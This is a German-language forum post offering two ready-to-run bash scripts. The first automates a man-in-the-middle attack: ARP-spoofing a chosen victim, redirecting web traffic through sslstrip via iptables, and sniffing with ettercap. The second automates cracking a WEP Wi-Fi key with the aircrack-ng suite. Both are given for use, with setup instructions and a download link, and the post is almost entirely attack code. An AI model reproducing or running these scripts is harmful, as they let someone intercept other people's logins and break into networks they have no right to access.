Ich habe hier ein Script für euch geschrieben, mit dem ihr ganz einfach Sniffen könnt.
[IMG]hxxp://img704.imageshack.us/img704/7228/bildschirmfotoa.png[/IMG]
Code:
#!/bin/bash
txtblu='\e[0;34m' # Blue
echo -e "${txtblu} _ _                     _   _____       _  __  __  "
echo -e "${txtblu}(_) |                   | | /  ___|     (_)/ _|/ _| "
echo -e "${txtblu} _| |     ___   __ _  __| | \  --. _ __  _| |_| |_  "
echo -e "${txtblu}| | |    / _ \ / _  |/ _  |   --. \  _ \| |  _|  _| "
echo -e "${txtblu}| | |___| (_) | (_| | (_| | /\__/ / | | | | | | |   "
echo -e "${txtblu}|_\_____/\___/ \__,_|\__,_| \____/|_| |_|_|_| |_|  "
txtblu='\e[0;31m'
sleep 2
clear
echo -e "${txtblu} _ _                     _   _____       _  __  __  "
echo -e "${txtblu}(_) |                   | | /  ___|     (_)/ _|/ _| "
echo -e "${txtblu} _| |     ___   __ _  __| | \  --. _ __  _| |_| |_  "
echo -e "${txtblu}| | |    / _ \ / _  |/ _  |   --. \  _ \| |  _|  _| "
echo -e "${txtblu}| | |___| (_) | (_| | (_| | /\__/ / | | | | | | |   "
echo -e "${txtblu}|_\_____/\___/ \__,_|\__,_| \____/|_| |_|_|_| |_|  "
echo -e "${txtblu} Läd"
sleep 0.40
echo "."
sleep 0.40
echo "."
sleep 0.40
echo "."
sleep 0.40
echo "."
sleep 0.40
echo "."
sleep 0.25
echo "."
txtblu='\e[0;34m'
clear
echo -e "${txtblu} _ _                     _   _____       _  __  __  "
echo -e "${txtblu}(_) |                   | | /  ___|     (_)/ _|/ _| "
echo -e "${txtblu} _| |     ___   __ _  __| | \  --. _ __  _| |_| |_  "
echo -e "${txtblu}| | |    / _ \ / _  |/ _  |   --. \  _ \| |  _|  _| "
echo -e "${txtblu}| | |___| (_) | (_| | (_| | /\__/ / | | | | | | |   "
echo -e "${txtblu}|_\_____/\___/ \__,_|\__,_| \____/|_| |_|_|_| |_|  "
sleep 5
echo "1. Ubuntu"
echo "2. Backtrack"
echo "Bitte wähle dein OS"
read dis
if [ $dis -eq 1 ] ; then
 echo "Ist Ipv4 Forward an?" 
  if sudo sysctl -p | grep 1 
  then 
   echo "Super, dann gehts weiter" 
  fi
else
 echo "1" > /proc/sys/net/ipv4/ip_forward
 echo "Weiterleitung ist an!"
fi
sleep 2
echo "Wenn 1 dann ist alles ok"
cat /proc/sys/net/ipv4/ip_forward
echo "Bitte Gateway eingeben"
read Router
xterm -T ''Nmap'' -bg black -fg dodgerblue -e "nmap -sP $Router/24 ; bash" &
echo "Bitte Ziel-Ip eingeben"
read Ziel
echo "Interface?"
read inter
sleep 3
echo "Fenster im Hintergrund offen lassen" & xterm -T "Arpspoof" -bg black -fg dodgerblue -geometry 90x15 -e "sudo arpspoof -i $inter -t $Ziel $Router ; bash" & sleep 5 & echo "Nun werden die iptables eingerichtet" & sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 & sleep 5 & echo "Nun sslstrip" & xterm -T "SSLStrip" -bg black -fg dodgerblue -geometry 90x15 -e "sudo sslstrip -a -k -f ; bash" & sleep 5 & echo "Und nun Viel Spaß mit Ettercap!!" & sudo ettercap -T -q -i $inter
killall xterm
echo "Copyright by iLoad 2010, iload.cz.cc ."
Viel Spaß!
Um es zum laufen zu kriegen:
nano /etc/etter.conf
und NUR die Raute im Linux bereich (iptables) beim Redir_command_on wegmachen!
Also so Sollte es aussehen:
Code:
# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
EDIT:
Da ich so nett bin hab ich noch eins fürs WEP Cracken geschrieben:
Code:
#!/bin/bash
txtblu='\e[0;31m'
echo -e "${txtblu}                                ___           ___          _____    "
echo "    ___                        /  /\         /  /\        /  /::\   "
echo "   /  /\                      /  /::\       /  /::\      /  /:/\:\  "
echo "  /  /:/      ___     ___    /  /:/\:\     /  /:/\:\    /  /:/  \:\ "
echo " /__/::\     /__/\   /  /\  /  /:/  \:\   /  /:/~/::\  /__/:/ \__\:|"
echo " \__\/\:\__  \  \:\ /  /:/ /__/:/ \__\:\ /__/:/ /:/\:\ \  \:\ /  /:/"
echo "    \  \:\/\  \  \:\  /:/  \  \:\ /  /:/ \  \:\/:/__\/  \  \:\  /:/" 
echo "     \__\::/   \  \:\/:/    \  \:\  /:/   \  \::/        \  \:\/:/"  
echo "     /__/:/     \  \::/      \  \:\/:/     \  \:\         \  \::/"   
echo "     \__\/       \__\/        \  \::/       \  \:\         \__\/"    
echo "                               \__\/         \__\/"                  
echo "      ___           ___           ___   "
echo "     /__/\         /  /\         /  /\  "
echo "    _\_ \:\       /  /:/_       /  /::\ "
echo "   /__/\ \:\     /  /:/ /\     /  /:/\:\ "
echo "  _\_ \:\ \:\   /  /:/ /:/_   /  /:/~/:/"
echo " /__/\ \:\ \:\ /__/:/ /:/ /\ /__/:/ /:/" 
echo " \  \:\ \:\/:/ \  \:\/:/ /:/ \  \:\/:/"  
echo "  \  \:\ \::/   \  \::/ /:/   \  \::/ "  
echo "   \  \:\/:/     \  \:\/:/     \  \:\ "  
echo "    \  \::/       \  \::/       \  \:\ " 
echo "     \__\/         \__\/         \__\/"  
sleep 5
txtblu='\e[0;34m' # Blue
echo -e "${txtblu} Herzlich Willkommen!"
echo "Bitte gebe dein Interface an (wlan0)"
sudo iwconfig
echo "Jetzt eingeben"
read int
sudo airmon-ng start $int
echo "Nun Airodump, mit dem gerade erstelltem mon0 interface. zum Beenden bitte Ctrl+C drücken"
sleep 5
sudo airodump-ng mon0
echo "OK, bitte wähle einen Namen für die Datei"
read datei
echo "Auf welchem Channel arbeitet der AP?"
read ch
echo "Und nun die MAC des APs"
read mac
echo "Nun der Name (Bitte in richtiger groß/klein-Schreibung"
read name
echo "Und nun noch mal deine Hardware Adresse von unten aptippen"
ifconfig $int | grep Hardware
read hm
echo "BITTE ERST MIT CA. 30.000 PAKETEN MIT Ctrl + C ABBRECHEN!"
sleep 5
sudo airodump-ng -w $datei -c $ch --bssid $mac mon0 & xterm -T ''Registrieren'' -bg black -fg dodgerblue -e "sudo aireplay-ng -1 0 -e $name -a $mac -h $hm mon0 ; bash"
echo "Dann werden die Pakete reinjectet" & xterm -T ''Reinjecten'' -bg black -fg dodgerblue -e "sudo aireplay-ng -3 -b $mac -h $hm mon0 ; bash"
killall xterm
echo "Super, nun das cracken!"
ls
echo "Bitte den Namen der Datei eingeben (mit .cap)!"
read DT
sudo aircrack-ng $DT
echo "Das wars!, nun wird die Karte wieder in den Ursprungsmodus gebracht und dann kannst du dich mit deinem Lieblingsprogramm mit dem AP verbinden."
clear
echo "Copyright by iLoad 2010 , iload.cz.cc ."
exit
Ich wäre sehr dankbar für Feedback, damit ich diese Reihe noch fortsetzen kann!
Für die ganz faulen; Hier zum Runterladen hxxp://multiupload.com/8SG51S25W9
Könnte ein Mod bitte den BBcode für das bild so ändern das es sichtbar ist UND der Downloadlink UND den Titel ändern?

iLoad